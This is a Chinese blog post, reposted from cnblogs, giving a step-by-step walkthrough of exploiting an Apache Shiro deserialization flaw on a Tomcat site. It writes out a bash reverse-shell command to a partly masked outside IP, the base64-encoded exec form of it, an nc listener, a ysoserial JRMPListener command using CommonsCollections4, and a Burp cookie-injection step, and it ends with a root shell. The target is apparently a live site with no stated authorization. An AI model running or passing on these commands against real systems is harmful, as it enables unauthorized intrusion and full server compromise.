data:image/s3,"s3://crabby-images/b08a1/b08a122f2b1d37fc5d59076e726dde6aa0cde00f" alt=""
来自之前cnblog的博客
源地址:https://www.cnblogs.com/This-is-Y/p/13899977.html
拿到站点后发现是tomcat的,找了一圈找不到点进去,给学长看了一下,似乎是有个shiro可以利用
于是乎就去临时学习了一下
参考bypass的博客:https://www.cnblogs.com/xiaozi/p/13239046.html
1、java -jar .\shiro_tool.jar url
检测结果
data:image/s3,"s3://crabby-images/859d5/859d584a4de4d04104b2963f11b9d01d8d19f137" alt=""
2、服务器监听一个端口50058,这个是拿来反弹shell的
nc -lvnp 50058
反弹shell 命令:bash -i >& /dev/tcp/39.99.xx.xx/50058 0>&1
利用网站http://www.jackson-t.ca/runtime-exec-payloads.html对命令进行编码:bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8zOS45OS4xOTIuMjAvNTAwNT这是马赛克==}|{base64,-d}|{bash,-i}
3、使用这个大佬的工具:https://github.com/insightglacier/Shiro_exploit
在服务器上新建一个ssh会话,执行java -cp ysoserial.jar ysoserial.exploit.JRMPListener 50057 CommonsCollections4 ‘bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8zOS45OS4xOTIuMjAvNTAwNT这是马赛克==}|{base64,-d}|{bash,-i}’
这个端口50057是用来监听并反弹shell的,反弹到刚刚的50058端口上
data:image/s3,"s3://crabby-images/f71d6/f71d6c2cc6a27dff59841d088e433c1ef7108038" alt=""
4、准备一个shiro.py,代码如下。用来构造数据包
执行python shiro.py 39.99.xx.xx:50057
这里选择的端口是执行jar文件监听的端口,而不是用nc监听的那个
生成数据包
data:image/s3,"s3://crabby-images/709e4/709e4893f0128bbf0afe2a893bfd60c9c49c19ab" alt=""
用bp在网站登陆页面抓个包,在cookie中添加构造的参数,发送。可以看到响应包中有一个deleteme
data:image/s3,"s3://crabby-images/55e06/55e06a064be76dfb0719f3148f66617f6a3b6de9" alt=""
这时候在50057可以看到东西,
data:image/s3,"s3://crabby-images/619c3/619c3038714db2843ecf2b4d72258669e45d66c6" alt=""
同时在50058可以看到shell回来了(可能有点延迟。建议等一会)
data:image/s3,"s3://crabby-images/458b5/458b5de29293764a0d9f6da94a551ef23edc2116" alt=""
直接就是root权限
data:image/s3,"s3://crabby-images/f6a2c/f6a2cfae8cb2a835e00d5446ccb8a50787ea26ec" alt=""